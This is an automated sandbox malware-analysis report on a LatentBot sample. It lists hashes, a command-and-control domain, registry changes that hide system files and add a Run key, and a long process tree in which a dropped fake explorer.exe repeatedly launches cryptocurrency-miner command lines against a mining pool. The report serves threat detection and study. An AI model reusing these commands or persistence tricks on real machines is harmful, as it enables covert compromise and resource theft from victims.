Analysis
max time kernel: 18s
max time network: 147s
platform: windows10-2004_x64
resource: win10v2004-20250410-en
resource tags: arch:x64, arch:x86, image:win10v2004-20250410-en, locale:en-us, os:windows10-2004-x64, system
submitted: 20/04/2025, 05:30
Static task: static1
Behavioral task: behavioral1
Sample: JaffaCakes118_c4ad493a6bfd212c4e1418ba605020af.exe
Resource: win10v2004-20250410-en
Behavioral task: behavioral2
Sample: JaffaCakes118_c4ad493a6bfd212c4e1418ba605020af.exe
Resource: win11-20250410-en
General
Target: JaffaCakes118_c4ad493a6bfd212c4e1418ba605020af.exe
Size: 48KB
MD5: c4ad493a6bfd212c4e1418ba605020af
SHA1: 20272ac81bd1df68603924ae3b1fe4c2df034a29
SHA256: 492bd918e98e5802cf1ff5d3f0537567a7657477fff9cb5e7657448f64ead496
SHA512: 736487e85b4986284139599befb69a3483108c6199e6737524aafad9daa8614e67ab244859d71affacbcebba8e07af91fb2c4c10484f7988fa7dacd51897ccaf
SSDEEP: 768:/evN/sOhfTEr9IioMKMevN/sOhfTEr9IioMKa:/elEOhrkIwKMelEOhrkIwKa
Malware Config
Extracted
latentbot
superwaffles.zapto.org
Signatures
Latentbot family
Modifies visibility of hidden/system files in Explorer 2 TTPs 64 IoCs

| description | ioc | Process |
| --- | --- | --- |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | explorer.exe |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | JaffaCakes118_c4ad493a6bfd212c4e1418ba605020af.exe |
Executes dropped EXE 64 IoCs
Adds Run key to start application 2 TTPs 64 IoCs

| description | ioc | Process |
| --- | --- | --- |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | explorer.exe |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | JaffaCakes118_c4ad493a6bfd212c4e1418ba605020af.exe |
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

| description | ioc | Process |
| --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | explorer.exe |
Suspicious use of SetWindowsHookEx 64 IoCs
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_c4ad493a6bfd212c4e1418ba605020af.exe"C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_c4ad493a6bfd212c4e1418ba605020af.exe"1⤵
- Modifies visiblity of hidden/system files in Explorer
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4260 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas2⤵PID:1016
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe2⤵
- System Location Discovery: System Language Discovery
PID:2604
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵
- Suspicious use of WriteProcessMemory
PID:1880 -
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4700 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3876
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2664
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵
- Suspicious use of WriteProcessMemory
PID:4204 -
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3748 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3540
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵
- System Location Discovery: System Language Discovery
PID:4520
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵
- Suspicious use of WriteProcessMemory
PID:4336 -
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4100 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4812
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2212
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵
- Suspicious use of WriteProcessMemory
PID:4560 -
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:512 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:840
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵
- System Location Discovery: System Language Discovery
PID:3780
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵
- Suspicious use of WriteProcessMemory
PID:2252 -
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3052 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵
- System Location Discovery: System Language Discovery
PID:2264
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3564
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵
- Suspicious use of WriteProcessMemory
PID:4480 -
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1412 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3932
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4388
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵
- Suspicious use of WriteProcessMemory
PID:760 -
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:100 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4044
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1572
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4296
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1948 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:452
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2664
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1908
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1016 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2768
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3656
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2024
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:4204 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3192
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2240
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1648
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1108 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1596
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵
- System Location Discovery: System Language Discovery
PID:3988
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:664
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:5044 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3052
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵
- System Location Discovery: System Language Discovery
PID:2828
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3380
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3408 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1616
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵
- System Location Discovery: System Language Discovery
PID:4680
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2132
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:3620 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵
- System Location Discovery: System Language Discovery
PID:4388
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3344
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1800
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:1544 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵
- System Location Discovery: System Language Discovery
PID:628
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5108
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3208
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1828 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4684
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5048
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2136
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1436 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4956
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵
- System Location Discovery: System Language Discovery
PID:2860
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3852
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:4520 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2956
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:2212
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵
- System Location Discovery: System Language Discovery
PID:4408
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3444
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:3192 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1704
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3880
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:224
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:3988 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1468
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3052
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3660
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:968 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵
- System Location Discovery: System Language Discovery
PID:3140
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3380
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1564
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:2960 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2132
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5088
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1588
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3864 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2204
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3676
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3200
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:1916 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4004
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3504
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4624
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:64 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵
- System Location Discovery: System Language Discovery
PID:4488
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵
- System Location Discovery: System Language Discovery
PID:3668
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2604
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2432 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2644
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3748
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2108
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:440 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3424
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1856
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4528
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:4144 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:5044
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4608
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:840
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:4596 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4304
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵
- System Location Discovery: System Language Discovery
PID:2584
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:512
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:3440 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵
- System Location Discovery: System Language Discovery
PID:2688
-
-
